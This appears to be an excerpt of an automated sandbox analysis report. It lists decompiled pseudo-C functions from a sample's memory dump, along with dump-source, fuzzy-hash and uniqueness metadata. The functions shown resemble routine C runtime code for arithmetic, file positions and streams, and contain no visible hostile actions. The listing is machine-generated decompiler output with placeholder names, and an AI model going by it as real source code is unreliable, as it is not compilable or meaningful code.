                    				_t60 =  *((intOrPtr*)(_t125 + 0x10));
                    				_v72 = _a8;
                    				_v80 = _t125;
                    				_v76 = _t100;
                    				if(_t117 == 0) {
                    					L4:
                    					_t101 =  *(_t100 + 0xc);
                    					_t62 =  *((intOrPtr*)(_v76 + 0x10));
                    					if(_t101 == 0) {
                    						L8:
                    						_t101 =  &_v60;
                    						E013D1F70(_t98, _t101, _t117, _t144);
                    						E013F4EC6( &_v60, 0x143228c);
                    						L9:
                    						if(_t101 == 0) {
                    							goto L8;
                    						}
                    						if(_t117 >= _t101) {
                    							_t122 = (_t101 & 0x00000001) + _t101;
                    							_v68 = (_t117 & 0x00000001) + _t117;
                    							_t69 = E013D93B0(_t122);
                    							_t133 = _t132 + 4;
                    							E013D8390(_t98 + 4, _t122, _t69);
                    							_t103 =  *(_t98 + 0x10);
                    							__eflags = _t103;
                    							if(_t103 != 0) {
                    								__eflags =  *(_t98 + 0xc) << 2;
                    								E013F5890(_t122, _t103, 0,  *(_t98 + 0xc) << 2);
                    								_t133 = _t133 + 0xc;
                    							}
                    							 *((intOrPtr*)(_t98 + 8)) = 0x3fffffff;
                    							 *((intOrPtr*)(_t98 + 0x14)) = 0;
                    							_t74 = E013D93B0(_v68 - _t122 + 2);
                    							_t126 = _v72;
                    							_t134 = _t133 + 4;
                    							E013D8390(_t126 + 4, _t122, _t74);
                    							_t105 =  *(_t126 + 0x10);
                    							__eflags = _t105;
                    							if(_t105 != 0) {
                    								__eflags =  *(_t126 + 0xc) << 2;
                    								E013F5890(_t122, _t105, 0,  *(_t126 + 0xc) << 2);
                    								_t134 = _t134 + 0xc;
                    							}
                    							_t106 = _v68;
                    							 *((intOrPtr*)(_t126 + 8)) = 0x3fffffff;
                    							_v92 = 0x3fffffff;
                    							 *((intOrPtr*)(_t126 + 0x14)) = 0;
                    							_t128 = _v68 + (_t122 + 2) * 2 + _t122 + 2;
                    							_v88 = _t128;
                    							E013D5D20(_t117, _t128);
                    							_t135 = _t134 + 4;
                    							__eflags = _t128;
                    							if(_t128 != 0) {
                    								_t80 = E013CD970(_t106, _t122, _t128, _t128 * 4);
                    								_t135 = _t135 + 4;
                    							} else {
                    								_t80 = 0;
                    							}
                    							_v84 = _t80;
                    							_v8 = 0;
                    							E013D6580( *(_t98 + 0x10),  *((intOrPtr*)(_v72 + 0x10)), _t80,  *((intOrPtr*)(_v80 + 0x10)), _v68,  *((intOrPtr*)(_v76 + 0x10)), _t122);
                    							_t83 = E013C39AF( &_v96); // executed
                    							L12:
                    							 *[fs:0x0] = _v16;
                    							return E013F268B(_t83, _v20 ^ _t130);
                    						}
                    						E013D2BA0(_t98, _t125);
                    						 *((intOrPtr*)(_t98 + 0x14)) = 0;
                    						_t83 = E013D2BA0(_t119, E013D9320( &_v61, _t119));
                    						goto L12;
                    					}
                    					_t94 = _t62 + _t101 * 4 + 0xfffffffc;
                    					while( *_t94 == 0) {
                    						_t94 = _t94 - 4;
                    						_t101 = _t101 - 1;
                    						_t144 = _t101;
                    						if(_t101 != 0) {
                    							continue;
                    						}
                    						goto L8;
                    					}
                    					goto L9;
                    				}
                    				_t96 = _t60 + _t117 * 4 + 0xfffffffc;
                    				while( *_t96 == 0) {
                    					_t96 = _t96 - 4;
                    					_t117 = _t117 - 1;
                    					if(_t117 != 0) {
                    						continue;
                    					}
                    					goto L4;
                    				}
                    				goto L4;
                    			}

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013D879E
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID:
                    • API String ID: 2005118841-0
                    • Opcode ID: 1f9c494dafd647d026d04fc1bb037c215773b3b86c4403f54be36a2f7e48afc2
                    • Instruction ID: d4e899eb29b092e5c2538b3f5f3334746f0c2e40f7e8b54456a35e373c016fa0
                    • Opcode Fuzzy Hash: 1f9c494dafd647d026d04fc1bb037c215773b3b86c4403f54be36a2f7e48afc2
                    • Instruction Fuzzy Hash: 8751E4B2A002059FDB14DF68EC41BAEBBB9FF54318F15466DE8159B280DB31F911CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E014085C9(signed int __edx, intOrPtr* _a4) {
                    				char _v5;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _t64;
                    				signed int _t66;
                    				signed char _t68;
                    				signed int _t70;
                    				signed char _t77;
                    				intOrPtr* _t78;
                    				signed int _t79;
                    				signed char _t80;
                    				intOrPtr _t82;
                    				intOrPtr _t83;
                    				signed int _t90;
                    				intOrPtr _t93;
                    				signed int _t94;
                    				intOrPtr* _t95;
                    				signed char _t96;
                    				signed int _t99;
                    				signed int _t100;
                    				signed int _t103;
                    				signed int _t109;
                    				signed int _t111;
                    				signed int _t113;
                    				signed int _t114;
                    				signed int _t115;
                    				signed int _t118;
                    				signed int _t120;
                    
                    				_t104 = __edx;
                    				if(_a4 != 0) {
                    					_t64 = E01407888(_a4);
                    					_t93 = _a4;
                    					_t118 = _t64;
                    					__eflags =  *(_t93 + 8);
                    					if( *(_t93 + 8) < 0) {
                    						 *(_t93 + 8) = 0;
                    					}
                    					_t66 = E01408DFE(_t118, 0, 0, 1); // executed
                    					_t90 = _t104;
                    					_t109 = _t66;
                    					_v12 = _t109;
                    					__eflags = _t90;
                    					if(__eflags > 0) {
                    						L7:
                    						_t68 =  *(_a4 + 0xc);
                    						__eflags = _t68 & 0x000000c0;
                    						if((_t68 & 0x000000c0) != 0) {
                    							_t70 = _t118 >> 6;
                    							_t94 = (_t118 & 0x0000003f) * 0x30;
                    							_v16 = _t70;
                    							_v20 = _t94;
                    							_t95 = _a4;
                    							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0x143a740 + _t70 * 4)) + 0x29));
                    							_t96 =  *(_t95 + 0xc);
                    							asm("cdq");
                    							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
                    							__eflags = _t96 & 0x00000003;
                    							if((_t96 & 0x00000003) == 0) {
                    								_t77 =  *(_a4 + 0xc) >> 2;
                    								__eflags = _t77 & 0x00000001;
                    								if((_t77 & 0x00000001) != 0) {
                    									L23:
                    									_t78 = _a4;
                    									L24:
                    									__eflags = _t109 | _t90;
                    									if((_t109 | _t90) == 0) {
                    										L30:
                    										_t79 = _t120;
                    										goto L31;
                    									}
                    									_t80 =  *(_t78 + 0xc);
                    									__eflags = _t80 & 0x00000001;
                    									if((_t80 & 0x00000001) == 0) {
                    										__eflags = _v5 - 1;
                    										if(_v5 == 1) {
                    											_t120 = E013F2770(_t120, _t104, 2, 0);
                    										}
                    										_t120 = _t120 + _t109;
                    										asm("adc edx, ebx");
                    										goto L30;
                    									}
                    									_t79 = E0140875E(_a4, _t109, _t90, _t120, _t104);
                    									goto L31;
                    								}
                    								_t66 = E013FDB3A();
                    								 *_t66 = 0x16;
                    								goto L22;
                    							}
                    							__eflags = _v5 - 1;
                    							_t99 = _v16;
                    							if(_v5 != 1) {
                    								L13:
                    								_t82 =  *((intOrPtr*)(0x143a740 + _t99 * 4));
                    								_t100 = _v20;
                    								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
                    								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
                    									goto L23;
                    								}
                    								_t78 = _a4;
                    								_v20 = _v20 & 0x00000000;
                    								_t111 =  *(_t78 + 4);
                    								__eflags =  *_t78 - _t111;
                    								asm("sbb edi, edi");
                    								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
                    								__eflags = _t113;
                    								_v16 = _t113;
                    								_t109 = _v12;
                    								if(_t113 == 0) {
                    									goto L24;
                    								}
                    								_t103 =  *(_t78 + 4);
                    								_t114 = _v20;
                    								do {
                    									__eflags =  *_t103 - 0xa;
                    									if( *_t103 == 0xa) {
                    										_t120 = _t120 + 1;
                    										asm("adc edx, 0x0");
                    									}
                    									_t103 = _t103 + 1;
                    									_t114 = _t114 + 1;
                    									__eflags = _t114 - _v16;
                    								} while (_t114 != _v16);
                    								_t109 = _v12;
                    								goto L24;
                    							}
                    							_t115 = _v20;
                    							_t83 =  *((intOrPtr*)(0x143a740 + _t99 * 4));
                    							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
                    							_t109 = _v12;
                    							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
                    								goto L13;
                    							}
                    							_t79 = E014088E2(_a4, _t109, _t90);
                    							goto L31;
                    						}
                    						asm("cdq");
                    						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
                    						asm("sbb ebx, edx");
                    						goto L31;
                    					} else {
                    						if(__eflags < 0) {
                    							L22:
                    							_t79 = _t66 | 0xffffffff;
                    							L31:
                    							return _t79;
                    						}
                    						__eflags = _t109;
                    						if(_t109 < 0) {
                    							goto L22;
                    						}
                    						goto L7;
                    					}
                    				}
                    				 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    				return E013FDA61() | 0xffffffff;
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1554f700e1110e32cd1c2c0bba230fd8565b468dd313de5ed697ab215c265bfa
                    • Instruction ID: b14ded7e0720d2d3dd970d00a6203db5a5929e7a9f7d5f1ba6d84c9d6730d3ca
                    • Opcode Fuzzy Hash: 1554f700e1110e32cd1c2c0bba230fd8565b468dd313de5ed697ab215c265bfa
                    • Instruction Fuzzy Hash: A851E531E00106AFDB12DF2DCD44A6A7FA1EB85364F198579E8089B3E6C771ED42CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E013C7F11(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _v20;
                    				void* __ebp;
                    				signed int _t33;
                    				signed int _t36;
                    				intOrPtr _t37;
                    				intOrPtr _t38;
                    				void* _t44;
                    				void* _t46;
                    				signed int _t49;
                    				intOrPtr* _t60;
                    				intOrPtr* _t61;
                    				signed int _t62;
                    
                    				_t51 = __ecx;
                    				_t33 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t33 ^ _t62;
                    				_t61 = __ecx;
                    				_t60 = _a4;
                    				_t59 =  *((intOrPtr*)(__ecx + 0x1c));
                    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) != __ecx + 0x3c || _a16 != 1 ||  *((intOrPtr*)(__ecx + 0x38)) != 0) {
                    					_t36 = _a12;
                    					_t49 = _a8;
                    				} else {
                    					_t36 = _a12;
                    					_t49 = _a8 + 0xffffffff;
                    					asm("adc eax, 0xffffffff");
                    				}
                    				_v20 = _t36;
                    				if( *((intOrPtr*)(_t61 + 0x4c)) == 0 || E013C5A78(_t51, _t59) == 0) {
                    					L12:
                    					_t37 =  *0x141ef68; // 0xffffffff
                    					 *_t60 = _t37;
                    					_t38 =  *0x141ef6c; // 0xffffffff
                    					 *(_t60 + 8) =  *(_t60 + 8) & 0x00000000;
                    					 *(_t60 + 0xc) =  *(_t60 + 0xc) & 0x00000000;
                    					 *((intOrPtr*)(_t60 + 4)) = _t38;
                    					 *(_t60 + 0x10) =  *(_t60 + 0x10) & 0x00000000;
                    					 *(_t60 + 0x14) =  *(_t60 + 0x14) & 0x00000000;
                    				} else {
                    					_t54 = _v20;
                    					if((_t49 | _v20) != 0 || _a16 != 1) {
                    						_t44 = E013FE57C( *((intOrPtr*)(_t61 + 0x4c)), _t49, _t54, _a16); // executed
                    						if(_t44 != 0) {
                    							goto L12;
                    						} else {
                    							goto L10;
                    						}
                    					} else {
                    						L10:
                    						_t46 = E013FE0FF(_t59,  *((intOrPtr*)(_t61 + 0x4c)),  &_v16); // executed
                    						if(_t46 != 0) {
                    							goto L12;
                    						} else {
                    							E013C60BF(_t61);
                    							E013C2B37(_t60,  *((intOrPtr*)(_t61 + 0x40)),  *((intOrPtr*)(_t61 + 0x44)), _v16, _v12);
                    						}
                    					}
                    				}
                    				return E013F268B(_t60, _v8 ^ _t62);
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: fpos
                    • String ID:
                    • API String ID: 1083263101-0
                    • Opcode ID: 1e2b62a2db8b96c3b3287c4ad9553bf839d591166b85a7855d71f34f2d312631
                    • Instruction ID: 76d8d8c1b067d013fbafd241573cd6143901339092f9179477621c2239987fb0
                    • Opcode Fuzzy Hash: 1e2b62a2db8b96c3b3287c4ad9553bf839d591166b85a7855d71f34f2d312631
                    • Instruction Fuzzy Hash: 54317A3160060BEFDB21DF18C984A6AB3B5FF04729F00466DED1186691EB71ED28CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E013C7E38(intOrPtr* __ecx) {
                    				void* _t54;
                    				intOrPtr* _t62;
                    				intOrPtr* _t65;
                    				intOrPtr _t67;
                    				intOrPtr* _t68;
                    				intOrPtr _t70;
                    				intOrPtr* _t82;
                    				void* _t83;
                    				void* _t87;
                    				void* _t88;
                    
                    				_t62 = __ecx;
                    				_push(0x20);
                    				E013F26C2(E01415FA8);
                    				_t82 = _t62;
                    				_t75 =  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe | 0x00000004 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe;
                    				E013C6548( *((intOrPtr*)( *_t82 + 4)) + _t82,  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe | 0x00000004 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe,  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe | 0x00000004 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) & 0xfffffffe, 0);
                    				 *((intOrPtr*)(_t83 - 0x14)) = _t82;
                    				_t65 =  *((intOrPtr*)( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0x38));
                    				if(_t65 != 0) {
                    					 *((intOrPtr*)( *_t65 + 4))();
                    				}
                    				 *((intOrPtr*)(_t83 - 4)) = 0;
                    				 *((char*)(_t83 - 0x10)) = E013C5E97(_t82, _t75, 1);
                    				 *((intOrPtr*)(_t83 - 4)) = 1;
                    				_t67 =  *((intOrPtr*)( *_t82 + 4));
                    				if(( *(_t67 + _t82 + 0xc) & 0x00000006) == 0) {
                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t67 + _t82 + 0x38)))) + 0x28))(_t83 - 0x2c,  *((intOrPtr*)(_t83 + 8)),  *((intOrPtr*)(_t83 + 0xc)),  *((intOrPtr*)(_t83 + 0x10)), 1);
                    					_t54 =  *((intOrPtr*)(_t83 - 0x2c)) +  *((intOrPtr*)(_t83 - 0x24));
                    					_t70 =  *((intOrPtr*)(_t83 - 0x28));
                    					asm("adc ecx, [ebp-0x20]");
                    					_t87 = _t54 -  *0x141ef68; // 0xffffffff
                    					if(_t87 == 0) {
                    						_t88 = _t70 -  *0x141ef6c; // 0xffffffff
                    						if(_t88 == 0) {
                    							_t79 =  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 6 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 0x00000002;
                    							E013C6548( *((intOrPtr*)( *_t82 + 4)) + _t82,  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 6 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 0x00000002,  ==  ?  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 6 :  *( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0xc) | 0x00000002, 0);
                    						}
                    					}
                    				}
                    				 *((intOrPtr*)(_t83 - 4)) = 2;
                    				_t68 =  *((intOrPtr*)( *((intOrPtr*)( *_t82 + 4)) + _t82 + 0x38));
                    				if(_t68 != 0) {
                    					 *((intOrPtr*)( *_t68 + 8))();
                    				}
                    				return E013F269C(_t82);
                    			}

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C7E3F
                      • Part of subcall function 013C6548: __CxxThrowException@8.LIBVCRUNTIME ref: 013C65B7
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8H_prolog3Throw
                    • String ID:
                    • API String ID: 3670251406-0
                    • Opcode ID: d5531fd5e1a534bdd2488dd43ba186cd6607e8d38588fad51826add332a3168d
                    • Instruction ID: 72ca2f36314519fa766c4b441226a9ad267afee5536644d264f49043f48afcf0
                    • Opcode Fuzzy Hash: d5531fd5e1a534bdd2488dd43ba186cd6607e8d38588fad51826add332a3168d
                    • Instruction Fuzzy Hash: 1E314374600200DFDB24CF6DC894E6ABBF5BF98618B24849DE84A9B262C732ED01CF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E013FE183() {
                    				signed int _t29;
                    				signed int _t33;
                    				void* _t34;
                    				void* _t48;
                    				signed int _t53;
                    				intOrPtr _t56;
                    				void* _t57;
                    
                    				E013F3660(0x1433928, 0xc);
                    				_t56 =  *((intOrPtr*)(_t57 + 0xc));
                    				if((0 | _t56 != 0x00000000) != 0) {
                    					 *(_t57 - 0x1c) =  *(_t57 - 0x1c) & 0x00000000;
                    					E013FDCBC(_t56);
                    					 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
                    					if(( *(_t56 + 0xc) >> 0x0000000c & 0x00000001) != 0) {
                    						L14:
                    						_t29 = E013FE15A( *((intOrPtr*)(_t57 + 8)), _t56); // executed
                    						 *(_t57 - 0x1c) = _t29;
                    						 *(_t57 - 4) = 0xfffffffe;
                    						E013FE27F(_t56);
                    					} else {
                    						_t33 = E01407888(_t56);
                    						_t53 = _t33;
                    						if(_t53 == 0xffffffff || _t53 == 0xfffffffe) {
                    							_t48 = 0x14353a8;
                    							_t34 = 0x14353a8;
                    						} else {
                    							_t34 = (_t33 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x143a740 + (_t53 >> 6) * 4));
                    							_t48 = 0x14353a8;
                    						}
                    						if( *((char*)(_t34 + 0x29)) != 0) {
                    							L13:
                    							 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    							E013FDA61();
                    							E013FD560(_t57, 0x1435234, _t57 - 0x10, 0xfffffffe);
                    							goto L2;
                    						} else {
                    							if(_t53 != 0xffffffff && _t53 != 0xfffffffe) {
                    								_t48 = (_t53 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x143a740 + (_t53 >> 6) * 4));
                    							}
                    							if(( *(_t48 + 0x2d) & 0x00000001) == 0) {
                    								goto L14;
                    							} else {
                    								goto L13;
                    							}
                    						}
                    					}
                    				} else {
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					E013FDA61();
                    					L2:
                    				}
                    				return E013F36A6();
                    			}

                    APIs
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 013FE248
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: CallFilterFunc@8
                    • String ID:
                    • API String ID: 4062629308-0
                    • Opcode ID: 600fc02219b0d1b86cc2015785a61d6de67cc76c39f33e3737037d65276d5cdb
                    • Instruction ID: f54f282371a348e1e9f4007c1b81e41670d5cde38eb67afe765f173d104e5288
                    • Opcode Fuzzy Hash: 600fc02219b0d1b86cc2015785a61d6de67cc76c39f33e3737037d65276d5cdb
                    • Instruction Fuzzy Hash: AD212935A54209AEEB197B7CDC0476E3795AFA523CF25432ED7318E2F0EB7495028601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E013C74F4(intOrPtr* __ecx) {
                    				char _t38;
                    				void* _t52;
                    				intOrPtr* _t56;
                    				intOrPtr* _t57;
                    				void* _t60;
                    				intOrPtr* _t61;
                    				void* _t63;
                    				intOrPtr _t67;
                    				intOrPtr* _t69;
                    				void* _t70;
                    				intOrPtr _t73;
                    
                    				_t56 = __ecx;
                    				_push(0x14);
                    				E013F272D(E01415E83);
                    				_t69 = _t56;
                    				 *((intOrPtr*)(_t70 - 0x14)) = _t69;
                    				 *((intOrPtr*)(_t70 - 0x20)) = _t69;
                    				 *((intOrPtr*)(_t69 + 8)) = 0;
                    				 *((intOrPtr*)(_t69 + 0xc)) = 0;
                    				_t57 =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 4)) + _t69 + 0x38));
                    				if(_t57 != 0) {
                    					 *((intOrPtr*)( *_t57 + 4))();
                    				}
                    				 *((intOrPtr*)(_t70 - 4)) = 0;
                    				_t38 = E013C5E97(_t69, _t63, 1);
                    				 *((char*)(_t70 - 0x1c)) = _t38;
                    				 *((intOrPtr*)(_t70 - 4)) = 1;
                    				if(_t38 != 0) {
                    					_t73 =  *((intOrPtr*)(_t70 + 0x10));
                    					if(_t73 >= 0) {
                    						_t67 =  *((intOrPtr*)(_t70 + 0xc));
                    						if(_t73 > 0 || _t67 > 0) {
                    							 *((char*)(_t70 - 4)) = 2;
                    							_t52 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t69 + 4)) + _t69 + 0x38)))) + 0x20))( *((intOrPtr*)(_t70 + 8)), _t67,  *((intOrPtr*)(_t70 + 0x10)));
                    							 *((intOrPtr*)(_t69 + 8)) =  *((intOrPtr*)(_t69 + 8)) + _t52;
                    							asm("adc [esi+0xc], edx");
                    							if(_t52 !=  *((intOrPtr*)(_t70 + 0xc)) || _t67 !=  *((intOrPtr*)(_t70 + 0x10))) {
                    								_push(3);
                    								_pop(0);
                    							}
                    							 *((intOrPtr*)(_t70 - 4)) = 1;
                    						}
                    					}
                    				}
                    				_t60 =  *((intOrPtr*)( *_t69 + 4)) + _t69;
                    				if(0 != 0) {
                    					_t66 =  ==  ?  *(_t60 + 0xc) | 0x00000004 :  *(_t60 + 0xc);
                    					E013C6548(_t60,  ==  ?  *(_t60 + 0xc) | 0x00000004 :  *(_t60 + 0xc),  ==  ?  *(_t60 + 0xc) | 0x00000004 :  *(_t60 + 0xc), 0);
                    				}
                    				 *((intOrPtr*)(_t70 - 4)) = 4;
                    				_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 4)) + _t69 + 0x38));
                    				if(_t61 != 0) {
                    					 *((intOrPtr*)( *_t61 + 8))();
                    				}
                    				return E013F269C(_t69);
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_catch
                    • String ID:
                    • API String ID: 3886170330-0
                    • Opcode ID: 007ef013e26b6e1d6922dc013891cb053967f15edb2e65dd8caa960287323900
                    • Instruction ID: ba939e977cb2e18b875a16f4e74be1291c39daba120a07ceef50e9996db7d677
                    • Opcode Fuzzy Hash: 007ef013e26b6e1d6922dc013891cb053967f15edb2e65dd8caa960287323900
                    • Instruction Fuzzy Hash: 9A312774A00285DFDB20CF59C584AA9BBF1BFA8718F24C49DE9458B261C771ED41CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E013FDFFD() {
                    				signed int _t29;
                    				signed int _t33;
                    				void* _t34;
                    				void* _t47;
                    				signed int _t52;
                    				intOrPtr _t54;
                    				void* _t56;
                    
                    				E013F3660(0x1433908, 0x10);
                    				_t54 =  *((intOrPtr*)(_t56 + 8));
                    				 *((intOrPtr*)(_t56 - 0x20)) = _t54;
                    				if((0 | _t54 != 0x00000000) != 0) {
                    					 *(_t56 - 0x1c) =  *(_t56 - 0x1c) & 0x00000000;
                    					E013FDCBC(_t54);
                    					 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
                    					if(( *(_t54 + 0xc) >> 0x0000000c & 0x00000001) != 0) {
                    						L14:
                    						_t29 = E013FDFC1(_t54); // executed
                    						 *(_t56 - 0x1c) = _t29;
                    						 *(_t56 - 4) = 0xfffffffe;
                    						E013FE0F5();
                    					} else {
                    						_t33 = E01407888(_t54);
                    						_t52 = _t33;
                    						if(_t52 == 0xffffffff || _t52 == 0xfffffffe) {
                    							_t47 = 0x14353a8;
                    							_t34 = 0x14353a8;
                    						} else {
                    							_t34 = (_t33 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x143a740 + (_t52 >> 6) * 4));
                    							_t47 = 0x14353a8;
                    						}
                    						if( *((char*)(_t34 + 0x29)) != 0) {
                    							L13:
                    							 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    							E013FDA61();
                    							E013FD560(_t56, 0x1435234, _t56 - 0x10, 0xfffffffe);
                    							goto L2;
                    						} else {
                    							if(_t52 != 0xffffffff && _t52 != 0xfffffffe) {
                    								_t47 = (_t52 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x143a740 + (_t52 >> 6) * 4));
                    							}
                    							if(( *(_t47 + 0x2d) & 0x00000001) == 0) {
                    								goto L14;
                    							} else {
                    								goto L13;
                    							}
                    						}
                    					}
                    				} else {
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					E013FDA61();
                    					L2:
                    				}
                    				return E013F36A6();
                    			}











                    APIs
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 013FE0C5
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
